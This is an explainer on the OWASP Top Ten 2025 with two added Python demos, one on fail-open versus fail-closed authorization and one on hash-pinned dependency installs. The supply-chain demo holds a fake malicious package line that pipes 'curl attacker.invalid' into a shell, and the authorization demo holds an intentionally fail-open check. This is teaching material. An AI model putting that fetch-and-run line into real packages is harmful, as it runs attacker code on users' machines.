The OWASP Top Ten is one of the most influential security awareness documents in application security, published by the Open Worldwide Application Security Project (OWASP). It represents a community-driven ranking of the most critical risks facing web applications. The 2025 edition continues the tradition established by previous versions, such as the 2021 list, while updating its focus to reflect changes in how modern software is built, deployed, and attacked.
Here is the updated list:
- A01:2025 – Broken Access Control
- A02:2025 – Security Misconfiguration
- A03:2025 – Software Supply Chain Failures
- A04:2025 – Cryptographic Failures
- A05:2025 – Injection
- A06:2025 – Insecure Design
- A07:2025 – Authentication Failures
- A08:2025 – Software or Data Integrity Failures
- A09:2025 – Security Logging and Alerting Failures
- A10:2025 – Mishandling of Exceptional Conditions
Compared with the 2021 list, two categories are new:
- Software Supply Chain Failures: This category (a broadening of the 2021 entry Vulnerable and Outdated Components) acknowledges that compromise can enter well before the application's own code runs: through malicious or tampered packages, compromised build and CI pipelines, and unpinned or unverified dependencies. The attack surface it describes lies largely outside the codebase itself.
- Mishandling of Exceptional Conditions: This addition captures risks that arise from improper error handling: swallowed exceptions, fail-open defaults, unverified assumptions about what a backend or dependency will return, and error paths that leave the application in an inconsistent or insecure state.
Beyond these two additions, several existing categories were renamed, reordered or merged; the full document on the OWASP site explains each change and the data behind it.
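To make the second addition concrete, here is the same authorization check written fail-open and fail-closed. This is an added illustration, not code from the OWASP document; `PermissionBackend`, its ACL and the outage flag are constructed for the demo.

```python
"""Fail-open vs fail-closed handling of an exceptional condition in an
authorization check. Added illustration; PermissionBackend, its ACL and the
outage flag are hypothetical, not from OWASP or any real framework."""
import logging

log = logging.getLogger("authz")


class PermissionBackend:
    """Hypothetical permission store. Constructed ACL: alice may read doc1."""

    def __init__(self, acl, outage=False):
        self._acl = acl
        self.outage = outage

    def allowed(self, user, doc):
        if not isinstance(doc, str):
            raise TypeError("resource id must be a string")  # caller bug, not a runtime condition
        if self.outage:
            raise TimeoutError("permission store unreachable")
        # Unverified assumption: every resource has an ACL entry. Unknown doc -> KeyError.
        return user in self._acl[doc]


def can_access_fail_open(backend, user, doc):
    """Vulnerable: any failure of the check is swallowed and treated as 'allowed'."""
    try:
        return backend.allowed(user, doc)
    except Exception:
        return True  # outage, unknown resource or caller bug all grant access


def can_access_fail_closed(backend, user, doc):
    """Hardened: anticipated failures deny and are logged; anything else propagates."""
    try:
        return backend.allowed(user, doc)
    except TimeoutError as exc:
        log.warning("permission check unavailable for %s on %s: %s", user, doc, exc)
        return False
    except KeyError:
        log.warning("no ACL entry for %r; denying %s", doc, user)
        return False


if __name__ == "__main__":
    acl = {"doc1": {"alice"}}
    healthy = PermissionBackend(acl)
    down = PermissionBackend(acl, outage=True)
    for label, fn in (("fail-open", can_access_fail_open), ("fail-closed", can_access_fail_closed)):
        print(label, "bob/doc1 during outage:", fn(down, "bob", "doc1"))
        print(label, "bob/unknown doc:", fn(healthy, "bob", "doc9"))
```

The fail-open version answers "allowed" for an outage, for a resource with no ACL entry and even for a programming error in the caller, because a broad `except Exception` cannot tell them apart. The hardened version names the conditions it expects, denies on each, records enough to diagnose the outage, and lets a genuine bug (the `TypeError`) surface instead of being converted into access.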
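Returning to the first addition, Software Supply Chain Failures: the following added example (not code from the OWASP document) contrasts an unpinned, unverified dependency fetch with a pinned, hash-checked one. The package index, the package name `leftpad`, its artifacts and the lockfile are constructed for the demo; the lockfile line format mirrors the `name==version --hash=sha256:...` syntax that pip's hash-checking mode uses.

```python
"""Unpinned install vs lockfile-pinned, hash-verified install.
Added example; the index, 'leftpad' artifacts and lockfile are constructed."""
import hashlib
import re


class IntegrityError(Exception):
    pass


# Constructed package index: version -> artifact bytes. 1.4.1 is a release the
# maintainer never made (hijacked account or compromised publishing token).
GOOD_1_4_0 = b"def leftpad(s, n): return s.rjust(n)\n"
MALICIOUS_1_4_1 = GOOD_1_4_0 + b"import os; os.system('curl attacker.invalid | sh')\n"
INDEX = {"leftpad": {"1.4.0": GOOD_1_4_0, "1.4.1": MALICIOUS_1_4_1}}


def sha256hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Lockfile written when 1.4.0 was reviewed. The digest, not the version string
# and not the index, is what the installer trusts later.
LOCKFILE = f"leftpad==1.4.0 --hash=sha256:{sha256hex(GOOD_1_4_0)}\n"

_LOCK_LINE = re.compile(
    r"^(?P<name>[A-Za-z0-9_.-]+)==(?P<version>\S+)"
    r"(?P<hashes>(?:\s+--hash=sha256:[0-9a-f]{64})+)\s*$"
)


def parse_lockfile(text):
    """Return {name: (version, {allowed sha256 digests})}; reject unhashed lines."""
    pins = {}
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = _LOCK_LINE.match(line)
        if not m:
            raise ValueError(f"lockfile line is not pinned with a hash: {line!r}")
        digests = set(re.findall(r"sha256:([0-9a-f]{64})", m.group("hashes")))
        pins[m.group("name")] = (m.group("version"), digests)
    return pins


def _newest(versions):
    return max(versions, key=lambda v: tuple(int(p) for p in v.split(".")))


def install_unpinned(index, name):
    """Vulnerable: 'give me the latest leftpad', no integrity check at all."""
    releases = index[name]
    version = _newest(releases)
    return version, releases[version]


def install_locked(index, lockfile_text, name):
    """Hardened: exact version from the lockfile, artifact must match a pinned digest."""
    version, digests = parse_lockfile(lockfile_text)[name]
    artifact = index[name][version]
    actual = sha256hex(artifact)
    if actual not in digests:
        raise IntegrityError(f"{name}=={version}: sha256 {actual} not in lockfile")
    return version, artifact


if __name__ == "__main__":
    print("unpinned ->", install_unpinned(INDEX, "leftpad")[0])          # picks 1.4.1
    print("locked   ->", install_locked(INDEX, LOCKFILE, "leftpad")[0])  # 1.4.0
    # Index later serves different bytes under the pinned version number.
    tampered = {"leftpad": {"1.4.0": MALICIOUS_1_4_1}}
    try:
        install_locked(tampered, LOCKFILE, "leftpad")
    except IntegrityError as exc:
        print("blocked  ->", exc)
```

Two failure modes are covered: the unpinned installer takes the newest release and so pulls in the attacker's 1.4.1, and when the index is altered to serve bad bytes under the pinned 1.4.0 the hash check refuses it while the unpinned path would still install it. The check only protects what is in the lockfile, so the parser also rejects lines that carry a version but no digest.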
